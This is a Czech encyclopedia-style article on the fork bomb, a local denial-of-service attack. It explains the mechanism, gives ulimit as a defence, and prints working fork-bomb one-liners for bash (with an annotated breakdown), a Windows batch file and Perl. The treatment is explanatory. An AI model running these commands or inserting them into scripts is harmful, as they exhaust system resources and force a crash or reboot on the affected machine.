# Fork bomba

Principem fork bomby je neustávající dělení procesů

Fork bomba je jedna z lokálních podob útoku typu odmítnutí služby. Jejím principem je zneužití běžného systémového volání fork, které slouží k spouštění dalšího procesu.
Protože systém má jen omezené množství prostředků, může v něm běžet jen omezené množství procesů. V rámci fork bomby je ovšem spuštěno rychlé a neomezené množení procesů. To má za následek jednak postupné zpomalování počítače, kterému dochází volná paměť i procesorový čas, jednak posléze povede k tomu, že některý ze zdrojů dojde. Následkem toho nelze pouštět další procesy a to obvykle znamená, že ani nelze pustit proces (například kill), který by fork bombu ukončil. Jediným řešením, jak obnovit normální chod, tak bývá nové nabootování.

## Obrana
Jedním způsobem ochrany před fork bombou je limitovat počet procesů jednoho uživatele. Například v UN*Xových standardních příkazových interpretech je příkaz ulimit, který umožňuje nastavit maximální počet procesů.

## Příklady

### Bash
Jedním z nejznámějších příkladů fork bomby je následující třináctiznakový příkaz pro bash:
```
:
(){
 
:
|
:
&
 
}
;
:

```

Ten je možné rozepsat:i
```
:
()
      
# bude následovat definice funkce „:“

{
        
# začátek definice

    
:
    
# spusť funkci :

    
|
    
# a její výstup pošli

    
:
    
# další instanci funkce :

    
&
    
# to vše na pozadí, takže konec nadřízené funkce neovlivní běh jejích dětí

}
        
# konec definice funkce :

;
        
# Po definici následuje …

:
        
# … spuštění funkce :

```

### Dávkový soubor ve Windows
Fork bomba je též možná vytvořit užitím dávkového souboru ve Windows. Jeho příkaz je:
```
%0
|
%0

```

Tento příkaz rekurentně spouští sám sebe (%0 označuje jméno spuštěného souboru) a zahlcuje paměť systému novými procesy, dokud nedojde k pádu systému.

### Perl
V Perlu je vytvoření fork bomby také snadné
```
fork
 
while
 
fork

```